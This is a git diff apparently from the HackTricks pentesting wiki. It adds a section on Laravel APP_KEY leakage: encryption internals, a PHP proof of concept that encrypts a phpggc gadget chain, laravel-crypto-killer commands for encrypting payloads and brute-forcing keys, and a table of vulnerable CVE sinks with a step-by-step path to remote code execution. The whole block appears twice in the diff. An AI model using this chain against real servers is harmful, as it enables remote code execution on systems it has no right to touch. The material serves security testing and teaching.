Merge pull request #1091 from HackTricks-wiki/update_Laravel__APP_KEY_leakage_analysis_20250710_120305

carlospolop · web-flow · commit 3470d71e8f25 · 2025-07-10T14:09:57.000+02:00
Laravel APP_KEY leakage analysis
diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -1,5 +1,96 @@
 # Laravel
 
+{{#include /banners/hacktricks-training.md}}
+
+### Laravel SQLInjection
+
+Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Encryption internals (Laravel \u003e=5.6)
+
+Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).
+The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:
+
+```json
+{
+  "iv"   : "Base64(random 16-byte IV)",
+  "value": "Base64(ciphertext)",
+  "mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+  "tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+
+`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas
+`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.
+Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**.
+
+Minimal PoC (framework ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:
+
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
+
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+
+The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.
+
+---
+
+## Real-world vulnerable patterns
+
+| Project | Vulnerable sink | Gadget chain |
+|---------|-----------------|--------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
+| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
+
+The exploitation workflow is always:
+1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
+2. Generate gadget with **PHPGGC**
+3. `laravel_crypto_killer.py encrypt …`
+4. Deliver payload through the vulnerable parameter/cookie → **RCE**
+
+---
+
+## Mass APP_KEY discovery via cookie brute-force
+
+Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.
+
+Key findings of the research published by Synacktiv (2024-2025):
+* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
+* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
+* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
+* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
+
+The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
+
+---
+
+## References
+* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+
 {{#include ../../banners/hacktricks-training.md}}
 
 
@@ -101,7 +192,95 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
 Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
 
-{{#include ../../banners/hacktricks-training.md}}
+### Laravel SQLInjection
+
+Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
+
+---
+
+## APP_KEY & Encryption internals (Laravel \u003e=5.6)
+
+Laravel uses AES-256-CBC (or GCM) with HMAC integrity under the hood (`Illuminate\\Encryption\\Encrypter`).
+The raw ciphertext that is finally **sent to the client** is **Base64 of a JSON object** like:
+
+```json
+{
+  "iv"   : "Base64(random 16-byte IV)",
+  "value": "Base64(ciphertext)",
+  "mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
+  "tag"  : ""                 // only used for AEAD ciphers (GCM)
+}
+```
+
+`encrypt($value, $serialize=true)` will `serialize()` the plaintext by default, whereas
+`decrypt($payload, $unserialize=true)` **will automatically `unserialize()`** the decrypted value.
+Therefore **any attacker that knows the 32-byte secret `APP_KEY` can craft an encrypted PHP serialized object and gain RCE via magic methods (`__wakeup`, `__destruct`, …)**.
+
+Minimal PoC (framework ≥9.x):
+```php
+use Illuminate\Support\Facades\Crypt;
+
+$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
+$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
+```
+Inject the produced string into any vulnerable `decrypt()` sink (route param, cookie, session, …).
+
+---
+
+## laravel-crypto-killer 🧨
+[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automates the whole process and adds a convenient **bruteforce** mode:
+
+```bash
+# Encrypt a phpggc chain with a known APP_KEY
+laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
 
+# Decrypt a captured cookie / token
+laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
+
+# Try a word-list of keys against a token (offline)
+laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
+```
+
+The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.
+
+---
+
+## Real-world vulnerable patterns
+
+| Project | Vulnerable sink | Gadget chain |
+|---------|-----------------|--------------|
+| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
+| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
+| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |
+
+The exploitation workflow is always:
+1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
+2. Generate gadget with **PHPGGC**
+3. `laravel_crypto_killer.py encrypt …`
+4. Deliver payload through the vulnerable parameter/cookie → **RCE**
+
+---
+
+## Mass APP_KEY discovery via cookie brute-force
+
+Because every fresh Laravel response sets at least 1 encrypted cookie (`XSRF-TOKEN` and usually `laravel_session`), **public internet scanners (Shodan, Censys, …) leak millions of ciphertexts** that can be attacked offline.
+
+Key findings of the research published by Synacktiv (2024-2025):
+* Dataset July 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
+* Dataset May 2025 » 625 k tokens, **3.56 % keys cracked**
+* >1 000 servers still vulnerable to legacy CVE-2018-15133 because tokens directly contain serialized data.
+* Huge key reuse – the Top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
+
+The private Go tool **nounours** pushes AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, reducing full dataset cracking to <2 minutes.
+
+---
+
+## References
+* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
+* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
+* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+
+{{#include ../../banners/hacktricks-training.md}}
 
 
